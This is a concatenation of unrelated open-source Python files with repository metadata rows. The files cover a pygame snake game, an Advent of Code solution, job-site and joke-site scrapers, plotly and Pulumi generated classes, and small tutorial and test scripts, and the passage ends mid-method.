estimator.project_name = "dummy"
assert estimator.estimator is None
estimator._make_estimator() # normally done when calling `fit`
aml = estimator.estimator
assert aml
assert aml.build_control["stopping_criteria"]["seed"] == seed
assert aml.build_control["stopping_criteria"]["max_models"] == 5
assert aml.build_control["nfolds"] == 0
assert aml.build_control["project_name"] == "dummy"
pyunit_utils.run_tests([
test_all_params_are_visible_in_get_params,
test_all_params_can_be_set_using_set_params,
test_all_params_are_accessible_as_properties,
test_all_params_can_be_set_as_properties,
test_params_conflicting_with_sklearn_api_are_still_available,
test_params_are_correctly_passed_to_underlying_transformer,
test_params_are_correctly_passed_to_underlying_estimator,
test_params_are_correctly_passed_to_underlying_automl,
])
| [
"[email protected]"
] | |
e9d1caab6dde00c07ce3832efe253d9348ac4a88 | 940dcf18bb1db19610e29902c78ec703690c4297 | /pygame/py002.py | 17a13a71d3e9bdeacc203460516516e052a3e799 | [] | no_license | Sahil4UI/PythonRegular11-12Dec2020 | dc20e8d13d191801301d18d5b92f5775fe9c0674 | 0b22b1d8c703ac21a1f02c2b10f327bcb2e96460 | refs/heads/main | 2023-02-27T13:00:22.415199 | 2021-01-31T06:57:58 | 2021-01-31T06:57:58 | 318,424,644 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,076 | py | import random
import pygame
import time
from pygame.locals import *
pygame.init()
H= 600
W=800
gameScreen= pygame.display.set_mode((W,H))
color= (255,255,255)
red = (255 , 0 , 0 )
blue = (0,0,255)
w=30
h=30
pygame.time.set_timer(USEREVENT,1000)
frog=pygame.image.load("frog.png")#raw string-path
frog = pygame.transform.scale(frog,(50,50))
audio = pygame.mixer.Sound("point.wav")
def Score(counter):
font=pygame.font.SysFont(None,30)
#anti aliasing ->texture-> True
text=font.render(f"Score : {counter}",True,blue)
gameScreen.blit(text,(10,10))
def Snake(snakeList):
for i in snakeList:
pygame.draw.rect(gameScreen,red,[i[0],i[1],w,h])
def Timer(sec):
font=pygame.font.SysFont(None,30)
#anti aliasing ->texture-> True
text=font.render(f"Time Left : {sec} seconds",True,blue)
gameScreen.blit(text,(500,10))
def gameOver():
pass
# font=pygame.font.SysFont(None,30)
# #anti aliasing ->texture-> True
# text=font.render(f"***GAME OVER***",True,blue)
# gameScreen.blit(text,(500,10))
def main():
movex = 0
movey = 0
frogX = random.randint(0,W-50)
frogY = random.randint(0,H-50)
x=0
y=0
sec=20
counter=0
snakeList= []
snakeLength=1
while True:
gameScreen.fill(color)
for event in pygame.event.get():
if event.type==pygame.QUIT:
pygame.quit()
quit()
elif event.type==pygame.USEREVENT:
sec-=1
if event.type==pygame.KEYDOWN:
if event.key == pygame.K_LEFT:
movex=-1
movey=0
elif event.key == pygame.K_RIGHT:
movex=1
movey=0
elif event.key==pygame.K_UP:
movey=-1
movex=0
elif event.key==pygame.K_DOWN:
movey=1
movex=0
# gameScreen.blit(image,(imageX,imageY))
snake = pygame.draw.rect(gameScreen,red,[x,y,w,h])
snakeList.append([x,y])
Snake(snakeList)
frogRect = pygame.Rect([frogX,frogY,50,50])
gameScreen.blit(frog,(frogX,frogY))
x += movex
y += movey
if x>W-w:
movex=-1
elif x<0:
movex=1
if y>H-h:
movey=-1
elif y<0:
movey=1
Score(counter)
Timer(sec)
if sec <0:
gameOver()
if snakeLength<len(snakeList):
del snakeList[0]
if snake.colliderect(frogRect):
frogX = random.randint(0,W-50)
frogY = random.randint(0,H-50)
counter+=1
audio.play()
snakeLength+=20
pygame.display.update()
main()
| [
"[email protected]"
] | |
b540a1018ada187e4e6e105e8d050f936df3061b | f416ab3adfb5c641dc84022f918df43985c19a09 | /problems/advent-of-code/2022/05/sol2.py | 78cf7599b31d96f7b01fd8ad778ed956290eda79 | [] | no_license | NicoKNL/coding-problems | a4656e8423e8c7f54be1b9015a9502864f0b13a5 | 4c8c8d5da3cdf74aefcfad4e82066c4a4beb8c06 | refs/heads/master | 2023-07-26T02:00:35.834440 | 2023-07-11T22:47:13 | 2023-07-11T22:47:13 | 160,269,601 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,530 | py | import sys
def splitInput(lines):
stack_data = []
moves = []
parsing_stack = True
for line in lines:
if not line:
parsing_stack = False
continue
if parsing_stack:
stack_data.append(line)
else:
moves.append(line)
stack_count = int(stack_data[-1].split()[-1])
return stack_count, stack_data[:-1], moves
def parseStacks(count, data):
stacks = [[] for _ in range(count)]
for row in data:
print(row)
for i, c in enumerate(range(1, len(row), 4)):
if row[c].strip():
stacks[i].append(row[c])
stacks = [stack[::-1] for stack in stacks]
return stacks
def parseMoves(moves):
for i in range(len(moves)):
words = moves[i].split()
move = [words[1], words[3], words[5]] # [count, from, to]
move = list(map(int, move))
move[1] -= 1 # Use 0 based indexing
move[2] -= 1
moves[i] = move
def execute(moves, stacks):
for (count, s, t) in moves:
stacks[t].extend(stacks[s][-count:])
stacks[s] = stacks[s][:-count]
if __name__ == "__main__":
lines = [l[:-1] for l in sys.stdin]
stack_count, stack_data, moves = splitInput(lines)
stacks = parseStacks(stack_count, stack_data)
parseMoves(moves)
execute(moves, stacks)
answer = [" " for _ in range(stack_count)]
for i, stack in enumerate(stacks):
if stack:
answer[i] = stack[-1]
print("".join(answer))
| [
"[email protected]"
] | |
37be2dd7a036a0d6c20d49738fb4226536c20ac2 | ff21f04b692891b13fa2ed49293e5d99fea742db | /hunt/scripts/job_spider.py | 41015307bdb3af0ba459f972c27a7bd7b13714fd | [] | no_license | yangby-cryptape/job-hunter | 3caf49c9290a077661c8e245565132e2a8671c05 | 1b58b2f23ac7d1aba08feaff29692adb8fe58161 | refs/heads/master | 2021-05-27T17:35:09.370516 | 2012-06-25T07:38:06 | 2012-06-25T07:38:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,263 | py | #!/usr/bin/env python
#coding=utf-8
import hashlib, urllib2, time, re
from datetime import datetime
from pyquery import PyQuery as pq
from models import db, Occupational, Job, Company
def get_headers(gzip=False):
headers = {
"User-Agent":"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13",
# "User-Agent": "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.10 (maverick) Firefox/3.6.13"
"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language":"zh-cn,zh;q=0.5",
# "Accept-Encoding":"gzip,deflate",
"Accept-Charset":"utf-8;q=0.7,*;q=0.7",
"Keep-Alive":"115",
"Connection":"keep-alive",
# "Host":"",
# "Referer":"",
}
if gzip:
headers["Accept-Encoding"] = "gzip,deflate"
return headers
def getDomFromUrl(url):
req = urllib2.Request(
url = url,
headers = get_headers())
try:
request = urllib2.urlopen(req)
source = request.read()
request.close()
except Exception, e:
source = None
print e
ucontent = source.decode('utf-8')
dom = pq(ucontent)
return dom
def getCompanyInfo(dom):
'''获取一个公司的信息'''
info_items = dom('.companyInfoItems')
info_trs = info_items('.companyInfoTab tr')
company_info = {}
for tr in info_trs:
tr = pq(tr)
k = tr('td:eq(0)').text().split(u':')[0]
v = tr('td:eq(1)').text()
company_info[k] = v
scale = company_info.get(u'公司规模')
if scale:
sh = re.search(r'(\d+)-(\d+)', scale)
scale = sh.groups() if sh else (None, None)
else:
scale = (None, None)
####
jcs = dom('.jobContact>div>div').find('div') # Job Contact
for jc in jcs:
jc = pq(jc)
jctext = jc.text().split(u':')
if len(jctext) == 2:
k, v = jctext
company_info[k] = v
com = Company()
com.name = info_items('.companyTitle').text()
com.industry = company_info.get(u'公司行业')
com.type = company_info.get(u'公司类型')
com.address = company_info.get(u'公司地址')
com.website = company_info.get(u'公司主页')
com.scale_low, com.scale_high = scale
com.email = None
com.phone_num = None
com.description = dom('.black12 tr:eq(2)').find('td').html()
com.etag = ''
return com
def getJobInfo(dom, company):
'''获取一个职位的招聘信息'''
job_info = {}
type_tr = dom('.jobInfoItems tr:eq(0)')
trtext = type_tr.text()
trtext = trtext.split(u':') if trtext else []
if len(trtext) == 2:
k, v = trtext
v = v.replace('/', ',')
job_info[k] = v
trs = dom('.jobInfoItems tr:gt(1)')
for tr in trs:
tr = pq(tr)
tds = tr('td')
for td in tds:
td = pq(td)
tdtext = td.text().split(u':')
if len(tdtext) == 2:
k, v = tdtext
job_info[k] = v
salary = job_info.get(u'职位月薪')
if salary:
sh = re.search(r'(\d+)-(\d+)', salary)
salary = sh.groups() if sh else (None, None)
else:
salary = (None, None)
quantity = job_info.get(u'招聘人数')
if quantity:
sh = re.search(r'(\d+)', quantity)
quantity = sh.group(0) if sh else None
job = Job()
occ_type = job_info.get(u'职位类别')
occ = Occupational.query.filter(Occupational.type==occ_type).first()
if not occ:
occ = Occupational()
occ.name = 'FILL'
occ.type = occ_type
db.session.add(occ)
job.occupational = occ
job.type = job_info.get(u'工作性质')
job.exp = job_info.get(u'工作经验')
job.manage_exp = job_info.get(u'管理经验')
job.quantity = quantity
job.degree = job_info.get(u'最低学历')
job.salary_low, job.salary_high = salary
job.description = dom('.jobDes').html()
job.etag = ''
return job
def getPage(page_num):
time.sleep(0.6)
dom = getDomFromUrl('http://sou.zhaopin.com/jobs/jobsearch_jobtype.aspx?bj=160000&sj=045%3B079&jl=%E6%9D%AD%E5%B7%9E&sb=1&sm=0&p=' + page_num)
table = dom('#contentbox table:eq(1)')
trs = table('tr:gt(0)')
iseven = True
for tr in trs:
if iseven:
tr = pq(tr)
job_title = tr('#dvJobTit').text()
job_url = tr('#dvJobTit a').attr('href')
company_name = tr('#dvCompNM').text()
company_url = tr('#dvCompNM a').attr('href')
work_place = tr('td:eq(4)').text().split(' - ')
work_city = work_place[0]
work_area = work_place[1] if len(work_place) > 1 else None
public_date = tr('td:eq(5)').text()
time.sleep(0.6)
job_detail_dom = getDomFromUrl(job_url)
company = getCompanyInfo(job_detail_dom)
company.zhaopin_url = company_url
db.session.add(company)
job = getJobInfo(job_detail_dom, company)
job.company = company
job.title = job_title
job.work_city = work_city
job.work_area = work_area
job.public_date = public_date
job.zhaopin_url = job_url
db.session.add(job)
db.session.commit()
print datetime.now()
print 'This is Job %d' % job.id
iseven = not iseven
total_page = dom('.pagehead .num:eq(1)').text()
sh = re.search(r'(\d+)/(\d+)', total_page)
current_page, total_page = sh.groups() if sh else (None, None)
return int(current_page), int(total_page)
def doSpider():
print datetime.now()
print 'Start Get First page'
current_page, total_page = getPage('1')
print 'First page, Done!'
print 'Total page: %d\n' % total_page
for page_num in range(current_page+1, total_page+1):
print datetime.now()
print 'Start get page: [%d]' % page_num
getPage(str(page_num))
print 'page: [%d], Done!\n' % page_num
if __name__ == '__main__':
print 'BEGIN TEST'
doSpider()
print 'TEST DONE'
| [
"[email protected]"
] | |
521ea38335f0c6bebf7ef64a8d68203c32de69dc | f97cabce5c91238678e159387f03636d4deb90fb | /dajare/crawler_kaishaseikatsu_jp.py | c0bb1bb7c7b5cf459ec22cf9603ddf779b6d4b93 | [] | no_license | vaaaaanquish/dajare-python | 1daa8b4d31a9e3d5e1336d3b31693c1d491ed814 | 150132cef0333a94c9e286c4241af92c630cd7bd | refs/heads/master | 2022-12-10T08:46:42.827279 | 2020-12-11T03:28:54 | 2020-12-11T03:28:54 | 242,304,312 | 16 | 3 | null | 2022-12-08T03:43:06 | 2020-02-22T08:09:23 | Jupyter Notebook | UTF-8 | Python | false | false | 1,010 | py | from tqdm import tqdm
from dajare.crawler import Crawler
class CrawlerKaishaseikatsuJp(Crawler):
def run(self):
output_list = self._run()
self.output(output_list, 'dajare_kaishaseikatsu_jp.json')
def _run(self):
output_list = []
for i in tqdm(range(0, 2200, 100)):
url = f'http://archives.kaishaseikatsu.jp/cgi-bin/kaisha2/board_r.cgi?type=kaisha_dajare&next={i}&range=100'
bs = self.get_bs(url, encoding='shift-jis')
for x in bs.find_all('tr', bgcolor="#FBFFB2"):
output_list.append({
'text': x.find('td').text,
'url': url,
'author': 'kaishaseikatsu',
'author_link': 'http://archives.kaishaseikatsu.jp',
'mean_score': 0.,
'deviation_score': 0.,
'category': [],
'tag': [],
'eval_list': []
})
return output_list
| [
"[email protected]"
] | |
89a33a2d2fb2a28b98436986b935fd4cbc7f20a7 | 37fef592f365194c28579f95abd222cc4e1243ae | /streamlit/venv/venv/lib/python3.7/site-packages/plotly/graph_objs/splom/marker/colorbar/_tickformatstop.py | a3a8adde9676f505e52d3465cbd3ee72ce684873 | [] | no_license | edimaudo/Python-projects | be61e0d3fff63fb7bd00513dbf1401e2c1822cfb | 85d54badf82a0b653587a02e99daf389df62e012 | refs/heads/master | 2023-04-07T03:26:23.259959 | 2023-03-24T12:03:03 | 2023-03-24T12:03:03 | 72,611,253 | 4 | 3 | null | 2022-10-31T18:10:41 | 2016-11-02T06:37:17 | null | UTF-8 | Python | false | false | 9,564 | py | from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Tickformatstop(_BaseTraceHierarchyType):
# class properties
# --------------------
_parent_path_str = "splom.marker.colorbar"
_path_str = "splom.marker.colorbar.tickformatstop"
_valid_props = {"dtickrange", "enabled", "name", "templateitemname", "value"}
# dtickrange
# ----------
@property
def dtickrange(self):
"""
range [*min*, *max*], where "min", "max" - dtick values which
describe some zoom level, it is possible to omit "min" or "max"
value by passing "null"
The 'dtickrange' property is an info array that may be specified as:
* a list or tuple of 2 elements where:
(0) The 'dtickrange[0]' property accepts values of any type
(1) The 'dtickrange[1]' property accepts values of any type
Returns
-------
list
"""
return self["dtickrange"]
@dtickrange.setter
def dtickrange(self, val):
self["dtickrange"] = val
# enabled
# -------
@property
def enabled(self):
"""
Determines whether or not this stop is used. If `false`, this
stop is ignored even within its `dtickrange`.
The 'enabled' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self["enabled"]
@enabled.setter
def enabled(self, val):
self["enabled"] = val
# name
# ----
@property
def name(self):
"""
When used in a template, named items are created in the output
figure in addition to any items the figure already has in this
array. You can modify these items in the output figure by
making your own item with `templateitemname` matching this
`name` alongside your modifications (including `visible: false`
or `enabled: false` to hide it). Has no effect outside of a
template.
The 'name' property is a string and must be specified as:
- A string
- A number that will be converted to a string
Returns
-------
str
"""
return self["name"]
@name.setter
def name(self, val):
self["name"] = val
# templateitemname
# ----------------
@property
def templateitemname(self):
"""
Used to refer to a named item in this array in the template.
Named items from the template will be created even without a
matching item in the input figure, but you can modify one by
making an item with `templateitemname` matching its `name`,
alongside your modifications (including `visible: false` or
`enabled: false` to hide it). If there is no template or no
matching item, this item will be hidden unless you explicitly
show it with `visible: true`.
The 'templateitemname' property is a string and must be specified as:
- A string
- A number that will be converted to a string
Returns
-------
str
"""
return self["templateitemname"]
@templateitemname.setter
def templateitemname(self, val):
self["templateitemname"] = val
# value
# -----
@property
def value(self):
"""
string - dtickformat for described zoom level, the same as
"tickformat"
The 'value' property is a string and must be specified as:
- A string
- A number that will be converted to a string
Returns
-------
str
"""
return self["value"]
@value.setter
def value(self, val):
self["value"] = val
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
dtickrange
range [*min*, *max*], where "min", "max" - dtick values
which describe some zoom level, it is possible to omit
"min" or "max" value by passing "null"
enabled
Determines whether or not this stop is used. If
`false`, this stop is ignored even within its
`dtickrange`.
name
When used in a template, named items are created in the
output figure in addition to any items the figure
already has in this array. You can modify these items
in the output figure by making your own item with
`templateitemname` matching this `name` alongside your
modifications (including `visible: false` or `enabled:
false` to hide it). Has no effect outside of a
template.
templateitemname
Used to refer to a named item in this array in the
template. Named items from the template will be created
even without a matching item in the input figure, but
you can modify one by making an item with
`templateitemname` matching its `name`, alongside your
modifications (including `visible: false` or `enabled:
false` to hide it). If there is no template or no
matching item, this item will be hidden unless you
explicitly show it with `visible: true`.
value
string - dtickformat for described zoom level, the same
as "tickformat"
"""
def __init__(
self,
arg=None,
dtickrange=None,
enabled=None,
name=None,
templateitemname=None,
value=None,
**kwargs,
):
"""
Construct a new Tickformatstop object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of :class:`plotly.graph_objs.splom.marker.c
olorbar.Tickformatstop`
dtickrange
range [*min*, *max*], where "min", "max" - dtick values
which describe some zoom level, it is possible to omit
"min" or "max" value by passing "null"
enabled
Determines whether or not this stop is used. If
`false`, this stop is ignored even within its
`dtickrange`.
name
When used in a template, named items are created in the
output figure in addition to any items the figure
already has in this array. You can modify these items
in the output figure by making your own item with
`templateitemname` matching this `name` alongside your
modifications (including `visible: false` or `enabled:
false` to hide it). Has no effect outside of a
template.
templateitemname
Used to refer to a named item in this array in the
template. Named items from the template will be created
even without a matching item in the input figure, but
you can modify one by making an item with
`templateitemname` matching its `name`, alongside your
modifications (including `visible: false` or `enabled:
false` to hide it). If there is no template or no
matching item, this item will be hidden unless you
explicitly show it with `visible: true`.
value
string - dtickformat for described zoom level, the same
as "tickformat"
Returns
-------
Tickformatstop
"""
super(Tickformatstop, self).__init__("tickformatstops")
if "_parent" in kwargs:
self._parent = kwargs["_parent"]
return
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.splom.marker.colorbar.Tickformatstop
constructor must be a dict or
an instance of :class:`plotly.graph_objs.splom.marker.colorbar.Tickformatstop`"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
self._validate = kwargs.pop("_validate", True)
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("dtickrange", None)
_v = dtickrange if dtickrange is not None else _v
if _v is not None:
self["dtickrange"] = _v
_v = arg.pop("enabled", None)
_v = enabled if enabled is not None else _v
if _v is not None:
self["enabled"] = _v
_v = arg.pop("name", None)
_v = name if name is not None else _v
if _v is not None:
self["name"] = _v
_v = arg.pop("templateitemname", None)
_v = templateitemname if templateitemname is not None else _v
if _v is not None:
self["templateitemname"] = _v
_v = arg.pop("value", None)
_v = value if value is not None else _v
if _v is not None:
self["value"] = _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
| [
"[email protected]"
] | |
879086db133bd1ab22783e38d697afc115869d4f | 71c4a775c81179e920b72bdee87d9af3edfd4d99 | /01_Sintaxe_Basica/10_dicionario.py | 9ea3b3c107c7a83db1b023da9899d434b0a3d0f8 | [] | no_license | frclasso/acate18122018 | 16f4169dbfb0eb8c25e253965642122e6095a211 | 98e4697d4e34c740a537a553b5ae6841159c58f7 | refs/heads/master | 2020-04-08T00:54:59.822648 | 2019-01-24T16:55:42 | 2019-01-24T16:55:42 | 158,873,478 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,267 | py | #!/usr/bin/env python3
aluno = {'ID': 1223,
'Nome':'Patricia',
'Idade': 27,
'Curso': 'Sistemas de Informação',
'Turno':'Noturno'
}
print(f"ID: {aluno['ID']}")
print(f"Nome: {aluno['Nome']}")
print(f"Idade:{aluno['Idade']}")
print()
'''Atualizando valores existentes'''
aluno['Idade'] = 28
print(aluno)
print()
'''Inserindo novo campo'''
aluno['Matrícula'] = 8990020198
print(aluno)
print()
# Utilizando o metodo Update
aluno.update({'Turno':'Diurno', 'Sobrenome':'Nunes', 'Telefone':'(48)555-333'})
print(aluno)
print()
'''Deletando items'''
aluno.__delitem__('Idade')
print(aluno)
print()
aluno.pop('Turno')
print(aluno)
print()
del aluno['Matrícula']
print(aluno)
print()
'''Apagando todos os dados'''
# aluno.clear()
# print(aluno) # {}
'''Deletando o dicionario em si'''
# del aluno
# print(aluno) # NameError: name 'aluno' is not defined
'''Criando um dicionario vazio'''
meuDic = {}
print(meuDic)
print(type(meuDic))
#
print(f'Tamanho do dicionario: {len(aluno)} items.')
'''Imprimindo um dicionario com as chaves - keys()'''
print(aluno.keys())
'''Imprimindo um dicionario com os valores - values()'''
print(aluno.values())
'''Imprimindo um dicionario com todos os items'''
print(aluno.items())
| [
"[email protected]"
] | |
01e192a4c835a3d6ec4c29d6fb66176e51359dcb | 7c27898a5f85dedf0dbbb12451b6c635861dc197 | /tornado_overview/chapter03/aiomysql_test.py | 8c3375ad203593d54c3a67dc4692f73aa301b121 | [] | no_license | Asunqingwen/Tornado_test_application | 9323d3289fadf69e7b1e7685da8f631d0e88968f | 4f3a9cda9fc081a8b83f06934bc480cd597d4ad8 | refs/heads/master | 2023-02-18T08:43:58.012236 | 2021-01-21T09:59:57 | 2021-01-21T09:59:57 | 330,935,556 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 662 | py | import asyncio
import aiomysql
from tornado import gen, ioloop
async def go():
pool = await aiomysql.create_pool(host='192.168.10.69', port=3306,
user='root', password='root',
db='message', charset="utf8")
async with pool.acquire() as conn:
async with conn.cursor() as cur:
await cur.execute("SELECT * from message")
value = await cur.fetchone()
print(cur.description)
print(value)
pool.close()
await pool.wait_closed()
if __name__ == '__main__':
io_loop = ioloop.IOLoop.current()
io_loop.run_sync(go)
| [
"[email protected]"
] | |
b5346db185ed928a79136d01fd3e7a44a8ff0b6e | b22588340d7925b614a735bbbde1b351ad657ffc | /athena/PackDist/share/python/PackDistCommon.py | 0833847cfd1065059cea672b676003e232021674 | [] | no_license | rushioda/PIXELVALID_athena | 90befe12042c1249cbb3655dde1428bb9b9a42ce | 22df23187ef85e9c3120122c8375ea0e7d8ea440 | refs/heads/master | 2020-12-14T22:01:15.365949 | 2020-01-19T03:59:35 | 2020-01-19T03:59:35 | 234,836,993 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,754 | py | """File: PackDistCommon.py
Common classes and utility functions of the PackDist package.
"""
__author__ = 'Grigori Rybkine <[email protected]>'
__version__ = '0.2.1'
__date__ = 'Wed Oct 03 2012'
__all__ = ['Error', 'InputError', 'CommandError', 'exitstatus']
import sys
import os
class Error(Exception):
"""Base class for exceptions in this module."""
def __str__(self):
return ': '.join([str(arg) for arg in self.args])
def write(self, file = sys.stderr):
print >> file, '%s: %s' % (self.__class__.__name__, self)
class InputError(Error):
"""Exception raised for errors in the input.
Attributes:
expression() -- input expression in which the error occurred
message() -- explanation of the error
"""
def __init__(self, expression, message):
Error.__init__(self, expression, message)
def expression(self):
return self.args[0]
def message(self):
return self.args[1]
class CommandError(Error):
"""Exception raised for errors executing shell commands.
Attributes:
args[0] -- shell command executing which the error occurred
args[1] -- stderr and stdout of the command
args[2] -- exit status of the command
"""
def __init__(self, cmd, output, sc = None):
Error.__init__(self, cmd, output, sc)
def exitstatus (status):
"""Return child exit status, if child terminated normally, None otherwise.
Parameter status: child process status information as returned by os.wait(),
or os.waitpid(),
os.system(), close() method of file object returned by os.popen(),
commands.getstatusoutput()
"""
if os.WIFEXITED(status):
return os.WEXITSTATUS(status)
else:
return None
| [
"[email protected]"
] | |
b0593bc623f07101fd1c4aac9dd0a4ebc0980eb2 | 955b968d46b4c436be55daf8aa1b8fc8fe402610 | /ch04/set_window_size.py | 110459bc02e4e910978194acc115ddfccc6554d7 | [] | no_license | han-huang/python_selenium | 1c8159fd1421b1f0e87cb0df20ae4fe82450f879 | 56f9f5e5687cf533c678a1c12e1ecaa4c50a7795 | refs/heads/master | 2020-03-09T02:24:48.882279 | 2018-04-07T15:06:18 | 2018-04-07T15:06:18 | 128,535,917 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 265 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from selenium import webdriver
driver = webdriver.Firefox()
driver.get("https://mail.google.com")
# 參數字為像素點
print("設定瀏覽器寬480 高800顯示")
driver.set_window_size(480, 800)
# driver.quit()
| [
"vagrant@LaravelDemoSite"
] | vagrant@LaravelDemoSite |
87fa353d224bca02fb3655134746bec120ffc10b | 90419da201cd4948a27d3612f0b482c68026c96f | /sdk/python/pulumi_azure_nextgen/compute/v20191201/gallery_application_version.py | 09d6082a067f10eae575fb0b3681e034d10ed7c2 | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | test-wiz-sec/pulumi-azure-nextgen | cd4bee5d70cb0d332c04f16bb54e17d016d2adaf | 20a695af0d020b34b0f1c336e1b69702755174cc | refs/heads/master | 2023-06-08T02:35:52.639773 | 2020-11-06T22:39:06 | 2020-11-06T22:39:06 | 312,993,761 | 0 | 0 | Apache-2.0 | 2023-06-02T06:47:28 | 2020-11-15T09:04:00 | null | UTF-8 | Python | false | false | 7,987 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from . import outputs
from ._inputs import *
__all__ = ['GalleryApplicationVersion']
class GalleryApplicationVersion(pulumi.CustomResource):
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
gallery_application_name: Optional[pulumi.Input[str]] = None,
gallery_application_version_name: Optional[pulumi.Input[str]] = None,
gallery_name: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
publishing_profile: Optional[pulumi.Input[pulumi.InputType['GalleryApplicationVersionPublishingProfileArgs']]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None,
__name__=None,
__opts__=None):
"""
Specifies information about the gallery Application Version that you want to create or update.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] gallery_application_name: The name of the gallery Application Definition in which the Application Version is to be created.
:param pulumi.Input[str] gallery_application_version_name: The name of the gallery Application Version to be created. Needs to follow semantic version name pattern: The allowed characters are digit and period. Digits must be within the range of a 32-bit integer. Format: <MajorVersion>.<MinorVersion>.<Patch>
:param pulumi.Input[str] gallery_name: The name of the Shared Application Gallery in which the Application Definition resides.
:param pulumi.Input[str] location: Resource location
:param pulumi.Input[pulumi.InputType['GalleryApplicationVersionPublishingProfileArgs']] publishing_profile: The publishing profile of a gallery Image Version.
:param pulumi.Input[str] resource_group_name: The name of the resource group.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
if gallery_application_name is None:
raise TypeError("Missing required property 'gallery_application_name'")
__props__['gallery_application_name'] = gallery_application_name
if gallery_application_version_name is None:
raise TypeError("Missing required property 'gallery_application_version_name'")
__props__['gallery_application_version_name'] = gallery_application_version_name
if gallery_name is None:
raise TypeError("Missing required property 'gallery_name'")
__props__['gallery_name'] = gallery_name
if location is None:
raise TypeError("Missing required property 'location'")
__props__['location'] = location
if publishing_profile is None:
raise TypeError("Missing required property 'publishing_profile'")
__props__['publishing_profile'] = publishing_profile
if resource_group_name is None:
raise TypeError("Missing required property 'resource_group_name'")
__props__['resource_group_name'] = resource_group_name
__props__['tags'] = tags
__props__['name'] = None
__props__['provisioning_state'] = None
__props__['replication_status'] = None
__props__['type'] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:compute/latest:GalleryApplicationVersion"), pulumi.Alias(type_="azure-nextgen:compute/v20190301:GalleryApplicationVersion"), pulumi.Alias(type_="azure-nextgen:compute/v20190701:GalleryApplicationVersion"), pulumi.Alias(type_="azure-nextgen:compute/v20200930:GalleryApplicationVersion")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(GalleryApplicationVersion, __self__).__init__(
'azure-nextgen:compute/v20191201:GalleryApplicationVersion',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'GalleryApplicationVersion':
"""
Get an existing GalleryApplicationVersion resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
return GalleryApplicationVersion(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
"""
Resource location
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Resource name
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> pulumi.Output[str]:
"""
The provisioning state, which only appears in the response.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter(name="publishingProfile")
def publishing_profile(self) -> pulumi.Output['outputs.GalleryApplicationVersionPublishingProfileResponse']:
"""
The publishing profile of a gallery Image Version.
"""
return pulumi.get(self, "publishing_profile")
@property
@pulumi.getter(name="replicationStatus")
def replication_status(self) -> pulumi.Output['outputs.ReplicationStatusResponse']:
"""
This is the replication status of the gallery Image Version.
"""
return pulumi.get(self, "replication_status")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Resource tags
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Resource type
"""
return pulumi.get(self, "type")
def translate_output_property(self, prop):
